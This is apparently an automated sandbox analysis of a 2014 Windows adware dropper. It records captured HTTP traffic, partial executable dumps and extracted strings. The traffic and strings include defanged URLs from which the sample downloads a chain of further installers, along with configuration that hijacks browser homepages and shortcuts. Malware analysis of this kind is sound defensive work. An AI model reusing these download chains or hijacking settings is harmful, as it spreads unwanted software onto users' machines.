GET /upgrade/IFoxInfo.cfg HTTP/1.1
Accept: */*
Host: photocdn.hd.sohu.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 178
Connection: keep-alive
Server: SNS
Date: Wed, 30 Jul 2014 03:53:54 GMT
Last-Modified: Wed, 19 Feb 2014 00:18:01 GMT
Expires: Thu, 30 Jul 2015 03:53:54 GMT
Cache-Control: max-age=31536000
FSS-Cache: HIT from 4070211.6757197.4795244
Accept-Ranges: bytes
[ROOT]..VERSION=4.2.0.88..VALUE= 67240024..URL=hXXp://data.vod.itc.cn/
foxd/gz?file=SohuNewPlayer.exe&new=/212/10/LX1gaYhp2TxOw4UbWrnLg7.exe.
.HASH=65af374a44585e5495d803f6b94cc100HTTP/1.1 200 OK..Content-Type: a
pplication/octet-stream..Content-Length: 178..Connection: keep-alive..
Server: SNS..Date: Wed, 30 Jul 2014 03:53:54 GMT..Last-Modified: Wed, 
19 Feb 2014 00:18:01 GMT..Expires: Thu, 30 Jul 2015 03:53:54 GMT..Cach
e-Control: max-age=31536000..FSS-Cache: HIT from 4070211.6757197.47952
44..Accept-Ranges: bytes..[ROOT]..VERSION=4.2.0.88..VALUE= 67240024..U
RL=hXXp://data.vod.itc.cn/foxd/gz?file=SohuNewPlayer.exe&new=/212/10/L
X1gaYhp2TxOw4UbWrnLg7.exe..HASH=65af374a44585e5495d803f6b94cc100..



GET /open/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: down.yinyue.fm


HTTP/1.0 200 OK
Date: Thu, 18 Sep 2014 00:17:11 GMT
Content-Type: application/octet-stream
Content-Length: 3879912
Last-Modified: Thu, 18 Sep 2014 00:11:09 GMT
ETag: "541a231d-3b33e8"
Accept-Ranges: bytes
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......u.F.1.(.1.(.
1.(.....0.(.*...).(.*...C.(.*.....(.8...2.(.8...&.(.1.)...(.*...:.(.*.
..0.(.*...0.(.Rich1.(.........PE..L......S.................:....9.....
.........P....@...........................;......M;...@...............
..................\............99..........$;......0;.$....R..........
........................@............P..x............................t
ext....8.......:.................. ..`.rdata...W...P...X...>.......
.......@[email protected][email protected]......:9
.................@[email protected];..B....:[email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..j.h;GA.d.....P..h.$.
A.3..E.SVP.E.d......}..=`.A.3..]..G<...rA..G..rA..G..rA..G..rA..G..
sA..G,....f._0._2._4.G8...E..h.....G|..................v......E..E..;.
t.P.H.....3..u..G4.Y....w8......E..M.;.t.P.r{.....S.U.R.G.P.E......]..
]..]...`RA....M.d......Y^[.M.3...s....]...U.........$.A.3..E.h........
..j.P.....................Qj&j..............QA...u!............RP...QA
[email protected]. .W....?|..W.Rj........^}.......
..W......QP._z.......h.sA............h.rA.........M.3..._..r....].
<<< skipped >>>


GET /app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB  HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com


HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 18 Sep 2014 00:17:01 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=ehKhDDcf y8CAcGK9OfwIiB ; expires=Sun, 15-Sep-24 00:17:01 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Te
ngine..Date: Thu, 18 Sep 2014 00:17:01 GMT..Content-Type: image/gif..C
ontent-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa A
DMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=ehKhDDcf y8CA
cGK9OfwIiB ; expires=Sun, 15-Sep-24 00:17:01 GMT; path=/; domain=.cnzz
.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache.
.Pragma: no-cache..GIF89a.............!.......,...........L..;..



GET /packages/g_wz/default2/a-zm-157391-v5.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: client-b.jtdichan.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 18 Sep 2014 00:17:47 GMT
Content-Type: application/octet-stream
Content-Length: 1064280
Last-Modified: Wed, 09 Jul 2014 05:13:31 GMT
Connection: keep-alive
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......-u. i..si..s
i..s...sl..s...sb..s...sm..s...sm..s...sk..s...sp..si..sN..s...s{..s..
.sf..s...sh..sRichi..s........PE..L...}..S.....................@......
[email protected]............................
.................../..,.................... ..X.......................
.....................................................................t
ext............................... ..`.rdata...E.......P..............
....@[email protected]@...`... ...`[email protected].................
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /ecom?di=98364&dcb=BAIDU_DUP_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=4&dai=1&dds=&drs=3&dvi=1410832926<u=http://adsvc2.9365.info/ad/softad/popup.htm&liu=<r=&lcr=&ps=13x8&psr=1276x846&par=1276x818&pcs=0x0&pss=20x30&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_id= HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cb.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:16:59 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 319
Connection: Keep-Alive
Set-Cookie: BAIDUID=05FFD108C60D2FA03361A7A03E62FD9E:FG=1; expires=Fri, 18-Sep-45 00:16:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Set-Cookie: BAIDUID=; path=/; expires=Thu, 01-Jan-70 00:00:01 GMT
P3P: CP=" OTI DSP COR IVA OUR IND COM "
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu Sep 18 08:16:59 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
BAIDU_DUP_define('request!98364_0',[],{deps:['clb/popup7o'],data:{"id"
 : "98364","_stype" : 2,"_w" : 350,"_h" : 280,"_type" : "json_html","_
html" : "","_fxp" : false,"_sf" : false,"_st" : 0,"_top" : 0,"_left" :
 0,"_hs" : 30,"_vs" : 30,"_bf" : true,"_isMlt" : false,"_fr" : false,"
_qid" : "68c8e2b1c55c89a3","_v" : 1}});HTTP/1.1 200 OK..Server: nginx.
.Date: Thu, 18 Sep 2014 00:16:59 GMT..Content-Type: text/javascript;ch
arset=UTF-8..Content-Length: 319..Connection: Keep-Alive..Set-Cookie: 
BAIDUID=05FFD108C60D2FA03361A7A03E62FD9E:FG=1; expires=Fri, 18-Sep-45 
00:16:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1..
Set-Cookie: BAIDUID=; path=/; expires=Thu, 01-Jan-70 00:00:01 GMT..P3P
: CP=" OTI DSP COR IVA OUR IND COM "..P3P: CP=" OTI DSP COR IVA OUR IN
D COM "..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Thu Se
p 18 08:16:59 2014..Cache-Control: post-check=0, pre-check=0..Pragma: 
no-cache..BAIDU_DUP_define('request!98364_0',[],{deps:['clb/popup7o'],
data:{"id" : "98364","_stype" : 2,"_w" : 350,"_h" : 280,"_type" : "jso
n_html","_html" : "","_fxp" : false,"_sf" : false,"_st" : 0,"_top" : 0
,"_left" : 0,"_hs" : 30,"_vs" : 30,"_bf" : true,"_isMlt" : false,"_fr"
 : false,"_qid" : "68c8e2b1c55c89a3","_v" : 1}});..
<<< skipped >>>


HEAD /DM15/DMSet.Xml HTTP/1.1
Content-Type: text/html
Host: update.yinyue.fm
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


HTTP/1.1 200 OK
Content-Length: 5604
Content-Type: text/xml
Last-Modified: Thu, 11 Sep 2014 02:53:27 GMT
Accept-Ranges: bytes
ETag: "331fd48f6bcdcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:02 GMT



GET /9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.7.2
Date: Thu, 18 Sep 2014 00:17:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101
Connection: keep-alive
Location: hXXp://175.6.4.178/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe
<html><head><title>Moved Temporarily</title>&l
t;/head><body><h1>302 Moved Temporarily</h1></
body></html>HTTP/1.1 302 Moved Temporarily..Server: nginx/1.7
.2..Date: Thu, 18 Sep 2014 00:17:06 GMT..Content-Type: text/html; char
set=utf-8..Content-Length: 101..Connection: keep-alive..Location: http
://175.6.4.178/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/1
5474/setup_2949-14598.exe..<html><head><title>Moved 
Temporarily</title></head><body><h1>302 Moved 
Temporarily</h1></body></html>..



GET /core.php?web_id=4327411&show=pic&t=z HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Thu, 18 Sep 2014 00:16:56 GMT
Expires: Thu, 18 Sep 2014 00:31:56 GMT
2f0..!function(){var p,q,r,a=encodeURIComponent,b="4327411",c="pic",d=
"",e="online_v3.php",f="hzs2.cnzz.com",g="1",h="pic",i="z",j="站
长统计",k=window["_CNZZDbridge_" b].bobject,l="http:
",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push(
"h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===
m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.cre
ateScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.p
hp?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.c
om/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'>
;<img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<
;a href='" q "' target=_blank title='" j "'>" j "</a>",k.crea
teIcon([p])))}();..0..HTTP/1.1 200 OK..Server: Tengine..Date: Thu, 18 
Sep 2014 00:16:56 GMT..Content-Type: application/javascript..Transfer-
Encoding: chunked..Connection: keep-alive..Last-Modified: Thu, 18 Sep 
2014 00:16:56 GMT..Expires: Thu, 18 Sep 2014 00:31:56 GMT..2f0..!funct
ion(){var p,q,r,a=encodeURIComponent,b="4327411",c="pic",d="",e="onlin
e_v3.php",f="hzs2.cnzz.com",g="1",h="pic",i="z",j="站长
2479;计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l
 "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.p
ush("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRe
quest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIc
on(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_
<<< skipped >>>


GET /count/softcount/?pwc HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Content-Location: hXXp://adsvc2.9365.info/count/softcount/index.htm
Last-Modified: Tue, 06 Nov 2012 14:53:28 GMT
Accept-Ranges: bytes
ETag: "44c497b2ebccd1:1cc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:29 GMT
<script src="hXXp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411
&show=pic" language="JavaScript"></script>HTTP/1.1 200 OK..Co
ntent-Length: 109..Content-Type: text/html..Content-Location: hXXp://a
dsvc2.9365.info/count/softcount/index.htm..Last-Modified: Tue, 06 Nov 
2012 14:53:28 GMT..Accept-Ranges: bytes..ETag: "44c497b2ebccd1:1cc1"..
Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 18 Sep 20
14 00:14:29 GMT..<script src="hXXp://s85.cnzz.com/stat.php?id=43274
11&web_id=4327411&show=pic" language="JavaScript"></script>font>....


GET /ad/softad/pwc.htm HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive
Cookie: CNZZDATA4327411=cnzz_eid=921366142-1410999416-&ntime=1410999416


HTTP/1.1 200 OK
Content-Length: 1048
Content-Type: text/html
Last-Modified: Tue, 16 Sep 2014 12:45:51 GMT
Accept-Ranges: bytes
ETag: "f850dd25acd1cf1:1cc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:35 GMT
[dl]..hXXp://219.239.223.191/dls/axuls.exe=..hXXp://219.239.223.191/dl
s/axult.exe=..hXXp://219.239.223.191/hzsoft/IFoxInstall-y-c203945859-r
un-s-x.exe=..hXXp://click.t3nlink.com/link/140896/setup_2948-140896.ex
e=..hXXp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5
.exe=..hXXp://down.chinashangrui.com/xkgb/xkcc_50091167828.exe=..http:
//down.nisoka.com/happy/-1303_1_td.exe=..hXXp://down.haoie.net/2suys_3
1_1008_01.exe=..hXXp://download.grandcloud.cn/9291/25533/cyiesetup.exe
=..hXXp://download.grandcloud.cn/9291/25605/sjss_jing_zhimeng_217.exe=
..hXXp://down.tianyunxj.com/tqrl_89_177560.exe=..hXXp://down.shuyeer.n
et/jt/c79af4009041.exe=..hXXp://down.waisong8.com/input/jgimeside_yllm
_127.exe=..hXXp://down4.huorong.cn/sysdiag-c61.exe=..hXXp://guangqu.os
s-cn-hangzhou.aliyuncs.com/qd/meitulm_01.exe=..hXXp://down.shuyeer.net
/dudu/dudu_b_80068.exe=..hXXp://down.xiaoxinrili.com/hezi/jm/setup_t10
304.exe=..hXXp://down.9vh.net/apples_5_1008.exe=..[pw]..hXXp://hao.636
0.info/=..[hp]..hXXp://hao.6360.info/=..[hp2]..hao.uenet.info=HTTP/1.1
 200 OK..Content-Length: 1048..Content-Type: text/html..Last-Modified:
 Tue, 16 Sep 2014 12:45:51 GMT..Accept-Ranges: bytes..ETag: "f850dd25a
cd1cf1:1cc1"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: 
Thu, 18 Sep 2014 00:14:35 GMT..[dl]..hXXp://219.239.223.191/dls/axuls.
exe=..hXXp://219.239.223.191/dls/axult.exe=..hXXp://219.239.223.191/hz
soft/IFoxInstall-y-c203945859-run-s-x.exe=..hXXp://click.t3nlink.com/l
ink/140896/setup_2948-140896.exe=..hXXp://client-b.jtdichan.com/pa
<<< skipped >>>


GET /2suys_31_1008_01.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.haoie.net
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:11 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
 MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->.....
.


GET /2suys_31_1008_01.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.haoie.net
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:12 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
 MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->.....
.


GET /2suys_31_1008_01.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.haoie.net
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:12 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
 MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
04 Not Found..Server: nginx..Date: Thu, 18 Sep 2014 00:17:12 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>404 Not Found</title></hea
d>..<body bgcolor="white">..<center><h1>404 Not F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable 
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
 disable MSIE and Chrome friendly error page -->..<!-- a padding
 to disable MSIE and Chrome friendly error page -->....
<<< skipped >>>


POST /config/juese/adconf HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded


HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 606
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
{"lbt": "1800", "dbn": "6", "llt": "10800", "oeu2": "hXXp://s.sogv.com
/ext/update.7z", "ldt": "0", "dbs": "1", "dbt": "360", "mdt": "3600", 
"lbn": "5", "idn": "..netert Hao..23", "udu": "hXXp://VVV.hao123.com/?
tn=99283481_hao_pg", "lu": "hXXp://VVV.vool.cn/_right/", "ls": "1", "u
ds": "1", "ubs": "1", "oes": "1", "oeu": "hXXp://s.sogv.com/ext/ext.7z
", "ubn": "6", "udn": "lnetent Haol23", "upu": "hXXp://VVV.hao123.com/
?tn=99283481_hao_pg", "ibn": "4", "idu": "hXXp://hao.360.cn/?src=lm&ls
=n525187378f", "ids": "1", "st": "1410752066", "mu": "hXXp://VVV.vool.
cn/_mini/", "ms": "1", "ibs": "1", "ups": "1"}..



GET /js/s.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cbjs.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 16 Sep 2014 02:35:58 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Thu, 18 Sep 2014 00:21:56 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
33a8..............iw......W`.,..Y....`...u..q...Y...F.........A.x...w.
....=.w.6{.n7.....b0\6...<h<....q4M......V.,.o.E>......^..?..
...6...x.8..."k...h{?.E...$XD...[..l...<_....[HkS.....y...y<O...
I0....a.y...=}....7...l...i>]zA...r9k..e..0.y/...H..<....t.....s
....4..EW.`.G..8...g...9...=.&q.}=..X&,.J..<.Y...O..?.'...X.E...i..
.Q....E.c3....8.6.dr..h.w...dg..:.1.../.Y...|.....q.v.h.6]]D......mtYL
..2t.......U.2.. ..^6..*.....)].t...;.a.N..`9.d......5.......J.m..f..M
=l..k.^w.l...E.....,...(.R?i..|[email protected]
...@.'...ph....:..h.KN:g;;/.g.....N....C..j..a.1./.i0.U...P|...T...jf.
s.#}...lW.W..2...NJ.4....xR|.U .1N!.IQ......x.|>QU..."S..l..<.2.
/.!..w._........1.E.p.vY5...4....% ..Y}..X..g............~...iT ..vf.8
.....O.lJ..y~....O.v.|.....q`A.m&l!.....0...2.6Q...-.y1[z~...0./.e../.
...(....).1.y.%...p./M....... v....8.|p{...&e.9H.b..[>...\ ;.......
.d....^..e...PO.qm....}.R3o}.=<...k>..=..9...Y./.. ..(N....t.)..
`]i...e9...lHL.>............WY>..yC^.DN.i'..... .....(..........
w..H.".n....3.......[...._.A....S[cV.p.....4q....d.LIE...M...@[email protected]
3..M..8..M...;L(...GY.......E..a...^......q..[q..G..n'gcY.#.t.j..h._6.
#.....h.......4.?..7...w.:........I...}...g..k.:..5.fYz..$.O.Q~.g...d.
...s..O<...*.g.rY.?..pY./..t...dB...q.l*&{.x:....K;... J..IH"..|..n
<..I.O.O.......WSh.:?Mr.X>x.i..#{.b6).M..J...>.h8.....D......
HR.;.N`...V.....O.E......Y....k....j.....)4Mnn.0^......3(.g3...6....H.
.%.../....p.j..h,.\...=.3..T.....V.gfp.\e..-O.fu..)...n....lGQ.:..
<<< skipped >>>






The Dropped connects to the servers at the folowing location(s):







fjwyusp.exe_1336:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
EInvalidGraphicOperation
comctl32.dll
USER32.DLL
PasswordChar
OnKeyDown
OnKeyPress|
OnKeyUp
ssHorizontal
StringT%C
OnDataFindP%C
OnKeyUp$2C
Proportional
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
IMM32.DLL
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
ole32.dll
olepro32.dll
IWebBrowser
IWebBrowserApp8
IWebBrowser2l
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowser
MAPI32.DLL
TSQLTimeStampVariantType
TSQLTimeStampData
TSQLTimeStampDataH
SqlTimSt
%s %s
(%s%s)
-%s%s
%s-%s
%s%s-
-%s %s
%s %s-
%s -%s
(%s- %s)
(%s %s)
Uh.bI
ftParadoxOle
TLoginEvent
Password
pfInKey
ImportedConstraint
LookupKeyFields
KeyFields
TSQLTimeStampField
TSQLTimeStampFieldp
SQLTimeStamp
%s: %s
%s.%s
mtxex.dll
ctKeyset
TExecuteOption
eoAsyncExecute
eoExecuteNoRecords
TExecuteOptions
cmdUnknown
cmdText
cmdTable
cmdStoredProc
cmdFile
cmdTableDirect
TExecuteCompleteEvent
TWillExecuteEvent
LoginPromptD
OnExecuteComplete
OnWillExecute$lI
OnLogin
(%s%s%s%s%2:s)
RDSServer.DataFactory
COLUMN%d
%s[%s],
%s%s,
%s;%s
PRIMARY_KEY
EInvalidGridOperation
Windows Version %1x
Windows Version  
ThreadId %1x
HookCallback %1x
xcFastReport
TWWKeyCombo=Combobox
TWWTempKeyCombo=combobox
TO32DBFLEXEDIT=Edit
2.68.9.07
BUTTON.RADIO
BUTTON.CHECKBOX
3333333
Trackbar.ThumbHorz
Trackbar.ThumbVert
Trackbar.ThumbLeft
Trackbar.ThumbRight
Trackbar.ThumbUp
Trackbar.ThumbDown
UpDown.Horz
UpDown.Vert
webpopup
webcount
hXXp://VVV.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
*.lnk
Opera.lnk
WiseBrowser.lnk
TT.lnk
Mozilla Firefox.lnk
3.lnk
Maxthon.lnk
hXXp://dl.9365.info/dls/uepw.exe
uepw.exe
hXXp://down3.xzskycn.com/down/GGSafe_tjywmax(52).exe
hXXp://down1.xzskycn.com/down/GGSafe_tjywmax(52).exe
hXXp://down2.xzskycn.com/down/GGSafe_tjywmax(52).exe
soft\GGSafe_tjywmax(52).exe
hXXp://down3.xzskycn.com/down/haoie3199.exe
hXXp://down1.xzskycn.com/down/haoie3199.exe
hXXp://down2.xzskycn.com/down/haoie3199.exe
soft\haoie3199.exe
hXXp://down3.xzskycn.com/down/haozip_silence.205508.exe
hXXp://down1.xzskycn.com/down/haozip_silence.205508.exe
hXXp://down2.xzskycn.com/down/haozip_silence.205508.exe
soft\haozip_silence.205508.exe
hXXp://down3.xzskycn.com/down/caiyun_setup_3.85_feiyang163.exe
hXXp://down1.xzskycn.com/down/caiyun_setup_3.85_feiyang163.exe
hXXp://down2.xzskycn.com/down/caiyun_setup_3.85_feiyang163.exe
soft\caiyun_setup_3.85_feiyang163.exe
